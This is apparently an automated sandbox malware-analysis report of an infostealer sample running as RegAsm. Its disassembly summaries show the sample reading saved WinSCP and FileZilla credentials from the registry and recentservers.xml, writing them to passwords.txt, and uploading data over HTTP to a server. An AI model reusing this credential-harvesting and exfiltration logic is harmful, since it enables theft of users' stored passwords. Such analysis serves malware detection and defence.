GetProcAddress.KERNEL32(74DD0000,0156DEC0), ref: 00418F56
GetProcAddress.KERNEL32(74DD0000,0156DE48), ref: 00418F6E
GetProcAddress.KERNEL32(74DD0000,0156DE90), ref: 00418F87
GetProcAddress.KERNEL32(74DD0000,0156DEA8), ref: 00418F9F
GetProcAddress.KERNEL32(74DD0000,0156DED8), ref: 00418FB7
GetProcAddress.KERNEL32(74DD0000,01571318), ref: 00418FD0
GetProcAddress.KERNEL32(74DD0000,0156F2B0), ref: 00418FE8
GetProcAddress.KERNEL32(74DD0000,01571540), ref: 00419000
GetProcAddress.KERNEL32(74DD0000,01571408), ref: 00419019
GetProcAddress.KERNEL32(74DD0000,01562760), ref: 00419031
GetProcAddress.KERNEL32(74DD0000,015713D8), ref: 00419049
GetProcAddress.KERNEL32(74DD0000,01562680), ref: 00419062
GetProcAddress.KERNEL32(74DD0000,01571270), ref: 0041907A
GetProcAddress.KERNEL32(74DD0000,01571360), ref: 00419092
GetProcAddress.KERNEL32(74DD0000,015626A0), ref: 004190AB
GetProcAddress.KERNEL32(74DD0000,01562860), ref: 004190C3
LoadLibraryA.KERNEL32(015713C0,0041807F,?,00000040,00000064,004144A0,00413A10,?,0000002C,00000064,004143F0,00414440,?,00000024,00000064,00414340), ref: 004190D5
LoadLibraryA.KERNEL32(01571468), ref: 004190E6
LoadLibraryA.KERNEL32(015712E8), ref: 004190F8
LoadLibraryA.KERNEL32(01571330), ref: 0041910A
LoadLibraryA.KERNEL32(01571420), ref: 0041911B
LoadLibraryA.KERNEL32(01571450), ref: 0041912D
LoadLibraryA.KERNEL32(01571378), ref: 0041913F
LoadLibraryA.KERNEL32(01571288), ref: 00419150
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419160
GetProcAddress.KERNEL32(75290000,015626E0), ref: 0041917C
GetProcAddress.KERNEL32(75290000,01571300), ref: 00419194
GetProcAddress.KERNEL32(75290000,0156F6C0), ref: 004191AD
GetProcAddress.KERNEL32(75290000,01571438), ref: 004191C5
GetProcAddress.KERNEL32(75290000,01562700), ref: 004191DD
GetProcAddress.KERNEL32(6FD40000,015643B8), ref: 004191FD
GetProcAddress.KERNEL32(6FD40000,015625E0), ref: 00419215
GetProcAddress.KERNEL32(6FD40000,01564368), ref: 0041922E
GetProcAddress.KERNEL32(6FD40000,01571558), ref: 00419246
GetProcAddress.KERNEL32(6FD40000,015713F0), ref: 0041925E
GetProcAddress.KERNEL32(6FD40000,01562800), ref: 00419277
GetProcAddress.KERNEL32(6FD40000,015627E0), ref: 0041928F
GetProcAddress.KERNEL32(6FD40000,01571480), ref: 004192A7
GetProcAddress.KERNEL32(752C0000,01562840), ref: 004192C3
GetProcAddress.KERNEL32(752C0000,01562820), ref: 004192DB
GetProcAddress.KERNEL32(752C0000,01571498), ref: 004192F4
GetProcAddress.KERNEL32(752C0000,015714F8), ref: 0041930C
GetProcAddress.KERNEL32(752C0000,01562720), ref: 00419324
GetProcAddress.KERNEL32(74EC0000,015643E0), ref: 00419344
GetProcAddress.KERNEL32(74EC0000,01564430), ref: 0041935C
GetProcAddress.KERNEL32(74EC0000,01571528), ref: 00419375
GetProcAddress.KERNEL32(74EC0000,01562640), ref: 0041938D
GetProcAddress.KERNEL32(74EC0000,015628A0), ref: 004193A5
GetProcAddress.KERNEL32(74EC0000,01564408), ref: 004193BE
GetProcAddress.KERNEL32(75BD0000,015714B0), ref: 004193DE
GetProcAddress.KERNEL32(75BD0000,01562880), ref: 004193F6
GetProcAddress.KERNEL32(75BD0000,0156F7A0), ref: 0041940F
GetProcAddress.KERNEL32(75BD0000,01571348), ref: 00419427
GetProcAddress.KERNEL32(75BD0000,01571390), ref: 0041943F
GetProcAddress.KERNEL32(75BD0000,01562960), ref: 00419458
GetProcAddress.KERNEL32(75BD0000,01562600), ref: 00419470
GetProcAddress.KERNEL32(75BD0000,015714C8), ref: 00419488
GetProcAddress.KERNEL32(75BD0000,015714E0), ref: 004194A1
GetProcAddress.KERNEL32(75A70000,015628E0), ref: 004194BD
GetProcAddress.KERNEL32(75A70000,01571510), ref: 004194D5
GetProcAddress.KERNEL32(75A70000,015712A0), ref: 004194EE
GetProcAddress.KERNEL32(75A70000,015712B8), ref: 00419506
GetProcAddress.KERNEL32(75A70000,015712D0), ref: 0041951E
GetProcAddress.KERNEL32(75450000,015627A0), ref: 0041953A
GetProcAddress.KERNEL32(75450000,01562980), ref: 00419552
GetProcAddress.KERNEL32(75DA0000,015628C0), ref: 0041956E
GetProcAddress.KERNEL32(75DA0000,015713A8), ref: 00419586
GetProcAddress.KERNEL32(6F090000,01562620), ref: 004195A6
GetProcAddress.KERNEL32(6F090000,01562900), ref: 004195BE
GetProcAddress.KERNEL32(6F090000,015627C0), ref: 004195D7
GetProcAddress.KERNEL32(6F090000,01571588), ref: 004195EF
GetProcAddress.KERNEL32(6F090000,015625C0), ref: 00419607
GetProcAddress.KERNEL32(6F090000,01562920), ref: 00419620
GetProcAddress.KERNEL32(6F090000,015625A0), ref: 00419638
GetProcAddress.KERNEL32(6F090000,01571878), ref: 00419650
GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419667
GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 0041967E
GetProcAddress.KERNEL32(75AF0000,015715D0), ref: 0041969A
GetProcAddress.KERNEL32(75AF0000,0156F800), ref: 004196B2
GetProcAddress.KERNEL32(75AF0000,015715E8), ref: 004196CB
GetProcAddress.KERNEL32(75AF0000,01571600), ref: 004196E3
GetProcAddress.KERNEL32(75D90000,015717B8), ref: 004196FF
GetProcAddress.KERNEL32(6CB60000,01571618), ref: 0041971B
GetProcAddress.KERNEL32(6CB60000,01571838), ref: 00419733
GetProcAddress.KERNEL32(6CB60000,015715B8), ref: 0041974C
GetProcAddress.KERNEL32(6CB60000,01571630), ref: 00419764
GetProcAddress.KERNEL32(6C970000,SymMatchString), ref: 0041977E

Strings

HttpQueryInfoA, xrefs: 0041965C
dbghelp.dll, xrefs: 00419156
SymMatchString, xrefs: 00419778
InternetSetOptionA, xrefs: 00419673

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction ID: c5f05c92df86ae6c309de6d93bbb22230759f21ed052dce6c69101577189e498
Opcode Fuzzy Hash: c2eee7ed20b900ebed499d3f5db1f2319c82ae11ff88e2a78b23ac08a5a2bb96
Instruction Fuzzy Hash: F06210BD6002029FD744DFA5ECA896637FBF78BB413A06519FA05C7364E734A885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 87.9, APIs: 36, Strings: 14, Instructions: 371
stringregistrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040C58B
memset.MSVCRT ref: 0040C5AA
memset.MSVCRT ref: 0040C5C2
memset.MSVCRT ref: 0040C5DA
memset.MSVCRT ref: 0040C5ED
memset.MSVCRT ref: 0040C5FB
memset.MSVCRT ref: 0040C60C
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,000000FF), ref: 0040C62E
RegGetValueA.ADVAPI32(000000FF,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C69E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,000000FF), ref: 0040C6D6
RegEnumKeyExA.ADVAPI32(000000FF,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C718
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C72C
HeapAlloc.KERNEL32(00000000), ref: 0040C733
lstrcat.KERNEL32(00421610,Soft: WinSCP), ref: 0040C74C
lstrcat.KERNEL32(00421610,Host: ), ref: 0040C75B
RegGetValueA.ADVAPI32(000000FF,?,HostName,00000002,00000000,?,?), ref: 0040C77F
lstrcat.KERNEL32(00421610,?), ref: 0040C78C
RegGetValueA.ADVAPI32(000000FF,?,PortNumber,0000FFFF,00000000,?,?), ref: 0040C7B7
lstrcat.KERNEL32(00421610,00000000), ref: 0040C7DD
lstrcat.KERNEL32(00421610,:22), ref: 0040C7F9
lstrcat.KERNEL32(00421610,00427E4C), ref: 0040C808
lstrcat.KERNEL32(00421610,Login: ), ref: 0040C817
RegGetValueA.ADVAPI32(000000FF,?,UserName,00000002,00000000,?,?), ref: 0040C83B
lstrcat.KERNEL32(00421610,?), ref: 0040C848
lstrcat.KERNEL32(00421610,00427E64), ref: 0040C857
RegGetValueA.ADVAPI32(000000FF,?,Password,00000002,00000000,?,?), ref: 0040C87B
lstrcat.KERNEL32(00421610,Password: ), ref: 0040C886
StrCmpCA.SHLWAPI(?,00427B3E), ref: 0040C898
lstrcat.KERNEL32(00421610,00000000), ref: 0040C8D3
lstrcat.KERNEL32(00421610,00427E80), ref: 0040C8ED
lstrcat.KERNEL32(00421610,00427E84), ref: 0040C8FC
RegEnumKeyExA.ADVAPI32(000000FF,00000001,?,00000104,00000000,00000000,00000000,00000000), ref: 0040C921

Part of subcall function 00411C10: wsprintfA.USER32 ref: 00411C2B

memset.MSVCRT ref: 0040C932
memset.MSVCRT ref: 0040C940
lstrlen.KERNEL32(00421610), ref: 0040C958
memset.MSVCRT ref: 0040C9AB

Strings

passwords.txt, xrefs: 0040C96B
UserName, xrefs: 0040C82E
HostName, xrefs: 0040C772
Host: , xrefs: 0040C755
Security, xrefs: 0040C698
UseMasterPassword, xrefs: 0040C693
Password, xrefs: 0040C86E
PortNumber, xrefs: 0040C7A3
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040C61B
Login: , xrefs: 0040C811
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040C6CC
Soft: WinSCP, xrefs: 0040C746
:22, xrefs: 0040C7F3
Password: , xrefs: 0040C880

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$Value$EnumHeapOpen$AllocProcesslstrlenwsprintf
String ID: :22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 4109173386-1250616252
Opcode ID: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction ID: 39ec2e8349ec0f49430afd06625ec9b021e02694a525698c05ba917c3cb00e0c
Opcode Fuzzy Hash: dc3298bc845ddf6c22293eff1231b26737cd44cf51dda0dba3085e02b0da23e4
Instruction Fuzzy Hash: 51D17AB190021AEBDB10DBE4DC95EFFB77CEB48708F50459AF615A3280D6785E488B74

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 810
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56

Part of subcall function 004117A0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 004117C4
Part of subcall function 004117A0: GetProcessHeap.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117D3
Part of subcall function 004117A0: HeapAlloc.KERNEL32(00000000,?,?,00404E4A,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004117DA

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(?,0156F910,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405031
HttpOpenRequestA.WININET(00000000,0156F920,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405072
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405098

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0156F370,00000000,?,00427960,00000000,?,?), ref: 00405590
lstrlen.KERNEL32(00000000), ref: 004055A2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004055B5
HeapAlloc.KERNEL32(00000000), ref: 004055BC
lstrlen.KERNEL32(00000000), ref: 004055CE
memcpy.MSVCRT ref: 004055E2
lstrlen.KERNEL32(00000000,?,?), ref: 004055FB
memcpy.MSVCRT ref: 00405605
lstrlen.KERNEL32(00000000), ref: 00405616
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040562F
memcpy.MSVCRT ref: 0040563C
lstrlen.KERNEL32(00000000,?,00000000), ref: 00405652
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405663
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040568B
InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 004056D4
InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040572B
StrCmpCA.SHLWAPI(00000000,block), ref: 00405743
ExitProcess.KERNEL32 ref: 0040574E
InternetCloseHandle.WININET(00000000), ref: 0040575F

Strings

", xrefs: 0040516D
ERROR, xrefs: 00405698
", xrefs: 0040555E
", xrefs: 004052B5
block, xrefs: 00405735
------, xrefs: 00405348
ERROR, xrefs: 00405832
build_id, xrefs: 0040528C
", xrefs: 00405417
------, xrefs: 0040509E
file_data, xrefs: 00405535
--, xrefs: 00404F87
------, xrefs: 00404F60
------, xrefs: 004051E7
0, xrefs: 00405706
------, xrefs: 00405491

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
API String ID: 1603122859-3618031631
Opcode ID: 7278a04c7af3f5932436b1012c9fa67a354cd66aacf6a8854ca31b93a334b18a
Instruction ID: db5541188cdc9f639a804d86c40747d3c4d91d865bd81aad25c9fe7a46c42329
Opcode Fuzzy Hash: 7278a04c7af3f5932436b1012c9fa67a354cd66aacf6a8854ca31b93a334b18a
Instruction Fuzzy Hash: 20624471800249EADB15EBE5C951BEEBBB8AF19304F5041AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F0 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 401
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

strtok_s.MSVCRT ref: 0040CAE9
GetProcessHeap.KERNEL32(00000000,000F423F,00427B47,00427B46,00427B43,00427B42), ref: 0040CB3F
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB46
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
lstrcat.KERNEL32(?,00000000), ref: 0040CD55
lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
lstrcat.KERNEL32(?,00000000), ref: 0040CD77
lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

strtok_s.MSVCRT ref: 0040CE3B
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
memset.MSVCRT ref: 0040CEA5

Strings

Password: , xrefs: 0040CDC0
Soft: FileZilla, xrefs: 0040CD2D
<Host>, xrefs: 0040CB60
O{BN{BK{B, xrefs: 0040CE1C
passwords.txt, xrefs: 0040CE64
<User>, xrefs: 0040CBEA
<Port>, xrefs: 0040CBA2
<Pass encoding="base64">, xrefs: 0040CC32
Host: , xrefs: 0040CD3C
Login: , xrefs: 0040CD8F
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040CA75

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $O{BN{BK{B$Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 433178851-1966776650
Opcode ID: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction ID: d3b6116b1b73df3cabd5054aa1a62d8a43f82c6421f78d5ef7e496df56dda141
Opcode Fuzzy Hash: 553205438ed012d35cce61669005fd022498ce32dc9c1b61e4ae1c0d2a1abc7d
Instruction Fuzzy Hash: 3CE1A175904219EACB04EBA0DC56BEEBB78AF19304F50056EF901731C2DF786A48C769

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90 Relevance: 54.9, APIs: 21, Strings: 10, Instructions: 684
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D5A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F04
HttpOpenRequestA.WININET(00000000,0156F920,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405F44
lstrlen.KERNEL32(00000000,00000000,004205B9,?,00000000,004205B9,",00000000,004205B9,mode,00000000,004205B9,0156F370,00000000,004205B9,004279E8), ref: 00406342
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406353
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040635E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406365
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406376
memcpy.MSVCRT ref: 00406387
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406398
lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063B1
memcpy.MSVCRT ref: 004063BA
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004063CD
HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063E1
InternetReadFile.WININET(?,?,000000C7,00000000), ref: 004063F8
InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040644E
InternetCloseHandle.WININET(?), ref: 00406459
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F6B

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

InternetCloseHandle.WININET(00000000), ref: 00406466
InternetCloseHandle.WININET(00000000), ref: 00406470
StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000000), ref: 00405D7A

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

", xrefs: 00406040
*, xrefs: 00406525
", xrefs: 004062E8
------, xrefs: 0040621A
------, xrefs: 00405F71
------, xrefs: 004060BA
------, xrefs: 00405DFF
", xrefs: 00406187
mode, xrefs: 004062BF
build_id, xrefs: 0040615E

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
